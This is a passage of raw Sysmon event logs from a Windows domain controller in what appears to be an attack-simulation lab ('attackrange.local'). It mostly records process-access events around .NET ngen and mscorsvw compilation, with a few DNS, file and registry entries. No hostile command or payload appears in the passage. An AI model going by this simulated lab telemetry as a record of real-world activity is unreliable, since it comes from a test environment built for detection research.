LL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC4ADD)|UNKNOWN(0000000000FC2444)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NE
T\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.674{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:03.674{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.627{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.627{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:03.627{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC1D03)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+18f677(wow64) 22542200x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:02.159{59A5CD1D-8E56-6005-2E00-00000000A301}2464146.78.124.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:08.659{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.643{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:08.643{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.049{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.034{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.018{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.018{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:16.846{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:16.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:16.830{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:16.330{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f4-0\System.dll2021-01-18 13:44:16.330 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:17.096{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:17.096{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:22.783{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4d8-0\System.Xml.dll2021-01-18 13:44:22.783 13241300x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:22.643{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x0743a4f0) 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:23.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.205{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:23.205{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd